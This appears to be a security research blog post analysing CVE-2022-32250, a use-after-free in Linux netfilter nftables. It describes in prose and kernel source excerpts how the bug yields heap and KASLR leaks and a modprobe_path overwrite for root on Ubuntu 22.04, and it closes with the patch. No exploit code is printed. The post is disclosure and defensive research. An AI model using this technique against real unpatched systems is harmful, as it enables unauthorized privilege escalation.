Theori
Background
Netfilter is a framework in the Linux kernel for implementing various networking-related tasks with user-defined handlers. Netfilter provides various functions for packet filtering, network address translation and port translation, and packet logging. Netfilter represents a set of hooks that allow other kernel modules to register callback functions in the kernel’s networking stack.
nftables
is a component of Netfilter that filters or reroutes packets according to user-defined rules. nftables
supports sets
to make it easier to use multiple IP addresses, port numbers, etc. in a single rule. sets
can be represented using braces when defining rules (e.g., {22, 80, 443}), and sets
types include ipv4_addr
, ipv6_addr
, ether_addr
, inet_proto
, inet_service
, and mark
.
nftables
have tables
, chains
, rules
, and expressions
to store and process instructions. tables
contain several chains
and are linked to protocols such as IP
and IP6
. chains
include several rules
and the types of network traffic information to be processed. rules
contain several expressions
, and the information received by chains
is evaluated as rules
inside chains
. expressions
evaluate whether the input satisfies a set of conditions. How-The-Tables-Have-Turned-CVE-2022-1015-1016
Root Cause Analysis
PoC referenced oss-security - Linux Kernel use-after-free write in netfilter
CVE-2022-32250 is a use-after-free vulnerability in the Netfilter subsystem. The vulnerability occurs when a new nftset
is added with a NFT_MSG_NEWSET
command. When processing lookup
and dynset
expressions, freed chunk remains in set->binding
list due to an incorrect NFT_STATEFUL_EXPR
check. For this reason, use-after-free write occurs.
This vulnerability starts from nft_expr_init
. nft_expr_init
calls nf_tables_expr_parse
and allocates memory for an expr
. Afterwards, nf_tables_newexpr
initializes expr
.
static struct nft_expr *nft_expr_init(const struct nft_ctx *ctx,
const struct nlattr *nla)
{
struct nft_expr_info expr_info;
struct nft_expr *expr;
struct module *owner;
int err;
err = nf_tables_expr_parse(ctx, nla, &expr_info);
if (err < 0)
goto err1;
err = -ENOMEM;
expr = kzalloc(expr_info.ops->size, GFP_KERNEL);
if (expr == NULL)
goto err2;
err = nf_tables_newexpr(ctx, &expr_info, expr);
if (err < 0)
goto err3;
return expr;
err3:
kfree(expr);
err2:
owner = expr_info.ops->type->owner;
if (expr_info.ops->type->release_ops)
expr_info.ops->type->release_ops(expr_info.ops);
module_put(owner);
err1:
return ERR_PTR(err);
}
Since the structure is different depending on the type of expr
, a suitable structure is stored in data[]
. For example, the lookup
expression contains struct nft_lookup
in data[]
struct nft_expr {
const struct nft_expr_ops *ops;
unsigned char data[]
__attribute__((aligned(__alignof__(u64))));
};
struct nft_lookup {
struct nft_set * set;
u8 sreg;
u8 dreg;
bool invert;
struct nft_set_binding binding;
};
struct nft_set_binding {
struct list_head list;
const struct nft_chain * chain;
u32 flags;
};
nf_tables_newexpr
calls ops->init
by referring to ops
of expr
. In the case of lookup
, ops->init
contains nft_lookup_init
.
static int nf_tables_newexpr(const struct nft_ctx *ctx,
const struct nft_expr_info *expr_info,
struct nft_expr *expr)
{
const struct nft_expr_ops *ops = expr_info->ops;
int err;
expr->ops = ops;
if (ops->init) {
err = ops->init(ctx, expr, (const struct nlattr **)expr_info->tb);
if (err < 0)
goto err1;
}
return 0;
err1:
expr->ops = NULL;
return err;
}
nft_lookup_init
calls nf_tables_bind_set
. nf_tables_bind_set
binds the expr
in set->binding
at [1].
static int nft_lookup_init(const struct nft_ctx *ctx,
const struct nft_expr *expr,
const struct nlattr * const tb[])
{
struct nft_lookup *priv = nft_expr_priv(expr);
u8 genmask = nft_genmask_next(ctx->net);
struct nft_set *set;
u32 flags;
int err;
if (tb[NFTA_LOOKUP_SET] == NULL ||
tb[NFTA_LOOKUP_SREG] == NULL)
return -EINVAL;
set = nft_set_lookup_global(ctx->net, ctx->table, tb[NFTA_LOOKUP_SET],
tb[NFTA_LOOKUP_SET_ID], genmask);
if (IS_ERR(set))
return PTR_ERR(set);
...
priv->binding.flags = set->flags & NFT_SET_MAP;
err = nf_tables_bind_set(ctx, set, &priv->binding);
if (err < 0)
return err;
priv->set = set;
return 0;
}
int nf_tables_bind_set(const struct nft_ctx *ctx, struct nft_set *set,
struct nft_set_binding *binding)
{
struct nft_set_binding *i;
struct nft_set_iter iter;
if (set->use == UINT_MAX)
return -EOVERFLOW;
if (!list_empty(&set->bindings) && nft_set_is_anonymous(set))
return -EBUSY;
...
bind: // [1] bind expr to set->binding
binding->chain = ctx->chain;
list_add_tail_rcu(&binding->list, &set->bindings);
nft_set_trans_bind(ctx, set);
set->use++;
return 0;
When the execution of the nft_expr_init
is completed, it returns to the caller: nft_set_elem_expr_alloc
. If expr->ops->type->flags
is not NFT_EXPR_STATEFUL
, go to err_set_elem_expr
and call nft_expr_destroy
to remove the expression
added to set
.
struct nft_expr *nft_set_elem_expr_alloc(const struct nft_ctx *ctx,
const struct nft_set *set,
const struct nlattr *attr)
{
struct nft_expr *expr;
int err;
expr = nft_expr_init(ctx, attr);
if (IS_ERR(expr))
return expr;
err = -EOPNOTSUPP;
if (!(expr->ops->type->flags & NFT_EXPR_STATEFUL))
goto err_set_elem_expr;
if (expr->ops->type->flags & NFT_EXPR_GC) {
if (set->flags & NFT_SET_TIMEOUT)
goto err_set_elem_expr;
if (!set->ops->gc_init)
goto err_set_elem_expr;
set->ops->gc_init(set);
}
return expr;
err_set_elem_expr:
nft_expr_destroy(ctx, expr);
return ERR_PTR(err);
}
nf_tables_bind_set
is linked to expr
, so call nf_tables_expr_destroy
to remove it.
void nft_expr_destroy(const struct nft_ctx *ctx, struct nft_expr *expr)
{
nf_tables_expr_destroy(ctx, expr);
kfree(expr);
}
nf_tables_expr_destroy
calls expr->ops->destroy
. For lookup
expression, ops->destroy
contains nft_lookup_destroy
.
static void nf_tables_expr_destroy(const struct nft_ctx *ctx,
struct nft_expr *expr)
{
const struct nft_expr_type *type = expr->ops->type;
if (expr->ops->destroy)
expr->ops->destroy(ctx, expr);
module_put(type->owner);
}
nft_lookup_destroy
calls nf_tables_destroy_set
and nf_tables_destroy_set
tries to destroy set
. However, &set->bindings
contain the previously assigned expr, so nft_set_destroy
cannot be called. Therefore, the set
remains as it is, and the allocated expr
still exists in the binding of the set
.
static void nft_lookup_destroy(const struct nft_ctx *ctx,
const struct nft_expr *expr)
{
struct nft_lookup *priv = nft_expr_priv(expr);
nf_tables_destroy_set(ctx, priv->set);
}
void nf_tables_destroy_set(const struct nft_ctx *ctx, struct nft_set *set)
{
if (list_empty(&set->bindings) && nft_set_is_anonymous(set))
nft_set_destroy(ctx, set);
}
Although expr
remains in the list, nft_expr_destroy
frees the assigned expr
at [2]. So, if we try to bind another expr
to that set again, use-after-free write will occur.
void nft_expr_destroy(const struct nft_ctx *ctx, struct nft_expr *expr)
{
nf_tables_expr_destroy(ctx, expr);
kfree(expr); // [2] UAF occurred!
}
Exploitation
The exploitation is performed onUbuntu 22.04
with a5.15.0-27-generic kernel
.
The exploit has three main steps:
- Leak the
heap address
usingstruct user_key_payload
. - Leak
text address
usingmqueue
to get KASLR. - Overwrite
modprobe_path
.
Leak Heap Address
For Linux kernel exploitation, struct msg_msg
is the widely used primitive since it can perform both arbitrary reads and write by modifying the size
field.
On the 5.15.0-27-generic
kernel, struct msg_msg
is allocated to GFP_KERNEL_ACCOUNT
, while the struct nft_lookup
is allocated to the GFP_KERNEL
. If the GFP_KERNEL_ACCOUNT
flag is set, the kernel will use the kmalloc-cg-xx slab
. Otherwise, the kernel will use the kmalloc-xx slab
if the GFP_KERNEL
flag is set.
For this reason, we used user keyring to leak information. CVE-2022-34918-LPE-PoC
User keyring uses struct user_key_payload
and it has the following structure. We can control the size of struct user_key_payload
by changing the datalen
.
struct user_key_payload {
struct rcu_head rcu;
unsigned short datalen;
char data[] __aligned(__alignof__(u64));
};
struct callback_head {
struct callback_head *next;
void (*func)(struct callback_head *head);
} __attribute__((aligned(sizeof(void *))));
#define rcu_head callback_head
struct user_key_payload
is allocated from user_preparse
.
int user_preparse(struct key_preparsed_payload *prep)
{
struct user_key_payload *upayload;
size_t datalen = prep->datalen;
if (datalen <= 0 || datalen > 32767 || !prep->data)
return -EINVAL;
upayload = kmalloc(sizeof(*upayload) + datalen, GFP_KERNEL);
if (!upayload)
return -ENOMEM;
...
return 0;
}
struct user_key_payload
overlaps with the UAF’d chunk generated as described previously. user_key_payload
has a data field that starts from 0x18
, so arbitrary R/W is possible. Also, the UAF chunk (struct nft_lookup
) has a linked list. For this reason, if UAF is triggered twice, the second UAF address is written at the linked list location of the chunk where the UAF first occurred. Therefore, using UAF write, another UAF address is written to nft_lookup->binding->next
. It corresponds to the user_key_payload->data[0:8]
field. Consequently, it is possible to leak heap addresses by reading user_key_payload->data
.
struct user_key_payload {
struct rcu_head rcu; /* 0 10*/
unsigned short datalen; /* 10 2 */
/* padding */
char data[] __aligned(__alignof__(u64)); /* 18 -- */
};
Leak KASLR
msg_msg
is widely used to exploit the Linux kernel. However, this vulnerability is only possible to write an object’s 0x18
field, so it is hard to exploit with the existing method.
However, in the Linux kernel source code, mqueue
has functions suitable for exploitation. mqueue
manages multiple messages, and they are managed by struct posix_msg_tree_node
. It is allocated from [3].
static int do_mq_timedsend(mqd_t mqdes, const char __user *u_msg_ptr,
size_t msg_len, unsigned int msg_prio,
struct timespec64 *ts)
{
struct fd f;
struct inode *inode;
struct ext_wait_queue wait;
struct ext_wait_queue *receiver;
struct msg_msg *msg_ptr;
struct mqueue_inode_info *info;
ktime_t expires, *timeout = NULL;
struct posix_msg_tree_node *new_leaf = NULL;
int ret = 0;
DEFINE_WAKE_Q(wake_q);
if (unlikely(msg_prio >= (unsigned long) MQ_PRIO_MAX))
return -EINVAL;
if (ts) {
expires = timespec64_to_ktime(*ts);
timeout = &expires;
}
...
msg_ptr = load_msg(u_msg_ptr, msg_len);
if (IS_ERR(msg_ptr)) {
ret = PTR_ERR(msg_ptr);
goto out_fput;
}
msg_ptr->m_ts = msg_len;
msg_ptr->m_type = msg_prio;
if (!info->node_cache)
new_leaf = kmalloc(sizeof(*new_leaf), GFP_KERNEL); // [3] allocate new_leaf
...
struct posix_msg_tree_node
is allocated in kmalloc-64
and it is implemented as follows. The size of struct rb_node
is 0x18
so msg_list->next
has an offset of 0x18
.
struct posix_msg_tree_node {
struct rb_node rb_node;
struct list_head msg_list;
int priority;
};
struct rb_node {
unsigned long __rb_parent_color;
struct rb_node *rb_right;
struct rb_node *rb_left;
} __attribute__((aligned(sizeof(long))));
In the figure below, UAF 1
and UAF 2
are the first and second use-after-free’d struct nft_expr
, respectively. Each struct nft_expr
contains struct nft_lookup
in nft_expr->data
.
If we allocate UAF 1
and UAF 2
in a particular order, they will be connected as shown below.
- Allocate
UAF 1
chunk with the vulnerability. - Overwrite
struct posix_msg_tree_node
toUAF 1
by usingdo_mq_timedsend
function. - Write
(UAF 1)->binding->next = (UAF 2)->binding
and createUAF 2
. - Overwrite
struct user_key_payload
toUAF 2
by using thekeyctl
function.
UAF 1 UAF 2
------------------------------- -------------------------------
0x0 | rb color | rb_right | | rcu->next | rcu->func ptr |
--------------- --------------- --------------- ---------------
0x10 | rb_left | (UAF 2+0x18) | | data_len | data[0] |
--------------- --------------- --------------- ---------------
0x20 | .... | .... | | data[1] | data[2] |
--------------- --------------- --------------- ---------------
0x30 | .... | .... | | data[3] | data[4] |
--------------- --------------- --------------- ---------------
UAF 1 overlap info: struct nft_expr == struct posix_msg_tree_node
UAF 2 overlap info: struct nft_expr == struct user_key_payload
In this case, msg_list->next
of struct posix_msg_tree_node
becomes UAF 2+0x18
, and msg_list
connected with struct msg_msg
list. Therefore, the data[]
in UAF 2
is the same as overlapped with struct msg_msg
. It is organized as follows:
data[0] = m_list->next / data[1] = m_list->prev / data[2] = m_type / data[3] = m_ts
struct msg_msg {
struct list_head m_list;
long m_type;
size_t m_ts; /* message text size */
struct msg_msgseg *next;
void *security;
/* the actual message follows immediately */
};
Accordingly, the structure of struct msg_msg
can be modified. However, in the case of copy_to_user
, it is impossible to copy more than their slab size (currently kmalloc-64
). Therefore, KASLR is leaked only when appropriate structures are allocated below UAF 2
.
Previously, struct percpu_ref_data
was used for the KASLR leak of kmalloc-64
. Unfortunately, kfree(msg_msg->security)
is performed at free_msg
function. If struct percpu_ref_data
is allocated below UAF 2
, kernel crash occurs at free(count)
because the count
assigned by the io_uring
functions is 0x800000000000000001
. Therefore, we use struct user_key_payload
again.
struct percpu_ref_data {
atomic_long_t count;
percpu_ref_func_t *release;
percpu_ref_func_t *confirm_switch;
bool force_atomic:1;
bool allow_reinit:1;
struct rcu_head rcu;
struct percpu_ref *ref;
};
In struct user_key_payload
, struct rcu_head
exists. struct rcu_head
is a structure designed to wait for a critical section to be terminated. When the critical section is terminated, a callback function (rcu->func()
) is called. rcu_head
stores another rcu_head
address at the next
pointer.
Therefore, if this chunk exists below UAF 2
, a KASLR leak can be performed.
struct user_key_payload {
struct rcu_head rcu;
unsigned short datalen;
char data[] __aligned(__alignof__(u64));
};
struct callback_head {
struct callback_head *next;
void (*func)(struct callback_head *head);
} __attribute__((aligned(sizeof(void *))));
#define rcu_head callback_head
The function do_mq_timedreceive
is used to read the struct msg_msg
inside the mqueue
. do_mq_timedreceive
calls msg_get
to get struct msg_msg
[4]. msg_get
refers to the leaf
node to get the first struct msg_msg
[5] and calls list_del
[6] to unlink the first struct msg_msg
from the linked list.
Afterward, store_msg
executes copy_to_user
to send the data
[7]. Then, free_msg
frees struct msg_msg
and msg_msg->security
[8]. KASLR leak is possible because msg_msg->data
contains a function address: rcu->func
.
static int do_mq_timedreceive(mqd_t mqdes, char __user *u_msg_ptr,
size_t msg_len, unsigned int __user *u_msg_prio,
struct timespec64 *ts)
{
ssize_t ret;
struct msg_msg *msg_ptr;
struct fd f;
struct inode *inode;
struct mqueue_inode_info *info;
struct ext_wait_queue wait;
ktime_t expires, *timeout = NULL;
struct posix_msg_tree_node *new_leaf = NULL;
if (ts) {
expires = timespec64_to_ktime(*ts);
timeout = &expires;
}
...
else {
DEFINE_WAKE_Q(wake_q);
msg_ptr = msg_get(info); // [4] try to get msg_msg from leaf node
inode->i_atime = inode->i_mtime = inode->i_ctime =
current_time(inode);
/* There is now free space in the queue. */
pipelined_receive(&wake_q, info);
spin_unlock(&info->lock);
wake_up_q(&wake_q);
ret = 0;
}
if (ret == 0) {
ret = msg_ptr->m_ts;
if ((u_msg_prio && put_user(msg_ptr->m_type, u_msg_prio)) ||
store_msg(u_msg_ptr, msg_ptr, msg_ptr->m_ts)) { // [7] read data from msg_msg, call copy_to_user
ret = -EFAULT;
}
free_msg(msg_ptr); // [8] kfree msg_msg and msg_msg->security
}
out_fput:
fdput(f);
out:
return ret;
}
static inline struct msg_msg *msg_get(struct mqueue_inode_info *info)
{
struct rb_node *parent = NULL;
struct posix_msg_tree_node *leaf;
struct msg_msg *msg;
try_again:
/*
* During insert, low priorities go to the left and high to the
* right. On receive, we want the highest priorities first, so
* walk all the way to the right.
*/
parent = info->msg_tree_rightmost;
...
} else {
msg = list_first_entry(&leaf->msg_list, // [5] extract msg_msg at the front of list
struct msg_msg, m_list);
list_del(&msg->m_list); // [6] remove msg_msg from list
if (list_empty(&leaf->msg_list)) {
msg_tree_erase(leaf, info);
}
}
info->attr.mq_curmsgs--;
info->qsize -= msg->m_ts;
return msg;
}
modprobe PATH overwrite
In the msg_get
function, list_del
unlinks struct msg_msg
from the linked list. In this case, msg->prev->next=msg->next, msg->next->prev=msg->prev
linking occurs.
UAF 1 UAF 2
------------------------------- -------------------------------
0x0 | rb color | rb_right | | rcu->next | rcu->func ptr |
--------------- --------------- --------------- ---------------
0x10 | rb_left | (UAF 2+0x18) | | data_len | data[0] |
--------------- --------------- --------------- ---------------
0x20 | .... | .... | | data[1] | data[2] |
--------------- --------------- --------------- ---------------
0x30 | .... | .... | | data[3] | data[4] |
--------------- --------------- --------------- ---------------
UAF 1 overlap info: struct nft_expr == struct posix_msg_tree_node
UAF 2 overlap info: struct nft_expr == struct user_key_payload
data[0] = m_list->next / data[1] = m_list->prev / data[2] = m_type / data[3] = m_ts
struct msg_msg {
struct list_head m_list;
long m_type;
size_t m_ts; /* message text size */
struct msg_msgseg *next;
void *security;
/* the actual message follows immediately */
};
The base address of the kernel’s heap is 0xffff????00000000
. Therefore, we can write 0xffff????(our input)
at any kernel address.
modprobe_path
contains /sbin/modprobe
initially, so if the data[0]
and data[1]
have modified structure as (modprobe_path + 0x1 - 0x8
) and 0xffff????2f706d74
, we can write 0xffff????2f706d74
in modprobe_path + 0x1
(0x2f706d74
is /pmt
). Also, we already know ????
from heap leak.
As a result, modprobe_path
can be changed into /tmp/????\xff\xffprobe
.
Full exploit code is available at our GitHub repo. Note that this is only intended for educational/research purpose and you may not use it to cause any harm or damage.
Patch
nft_expr_init
should check expr_info.ops->type->flags
. Allocate expr
chunk only when the flag is NFT_EXPR_STATEFUL
.
diff --git a/net/netfilter/nf_tables_api.c b/net/netfilter/nf_tables_api.c
index 12fc9cda4a2cf..f296dfe86b622 100644
--- a/net/netfilter/nf_tables_api.c
+++ b/net/netfilter/nf_tables_api.c
@@ -2873,27 +2873,31 @@ static struct nft_expr *nft_expr_init(const struct nft_ctx *ctx,
err = nf_tables_expr_parse(ctx, nla, &expr_info);
if (err < 0)
- goto err1;
+ goto err_expr_parse;
+
+ err = -EOPNOTSUPP;
+ if (!(expr_info.ops->type->flags & NFT_EXPR_STATEFUL))
+ goto err_expr_stateful;
err = -ENOMEM;
expr = kzalloc(expr_info.ops->size, GFP_KERNEL_ACCOUNT); // Commit kernel version is higher.
if (expr == NULL) // So it just written as GFP_KERNEL_ACCOUNT
- goto err2;
+ goto err_expr_stateful;
err = nf_tables_newexpr(ctx, &expr_info, expr);
if (err < 0)
- goto err3;
+ goto err_expr_new;
return expr;
-err3:
+err_expr_new:
kfree(expr);
-err2:
+err_expr_stateful:
owner = expr_info.ops->type->owner;
if (expr_info.ops->type->release_ops)
expr_info.ops->type->release_ops(expr_info.ops);
module_put(owner);
-err1:
+err_expr_parse:
return ERR_PTR(err);
}
@@ -5413,9 +5417,6 @@ struct nft_expr *nft_set_elem_expr_alloc(const struct nft_ctx *ctx,
return expr;
err = -EOPNOTSUPP;
- if (!(expr->ops->type->flags & NFT_EXPR_STATEFUL))
- goto err_set_elem_expr;
-
if (expr->ops->type->flags & NFT_EXPR_GC) {
if (set->flags & NFT_SET_TIMEOUT)
goto err_set_elem_expr;
Conclusion
In this post, we have shown the process of exploiting CVE-2022-32250
. We were able to leak KASLR and overwrite modprobe_path
by utilizing the mqueue
functions, and as a result, we successfully gained root privileges in Ubuntu 22.04
.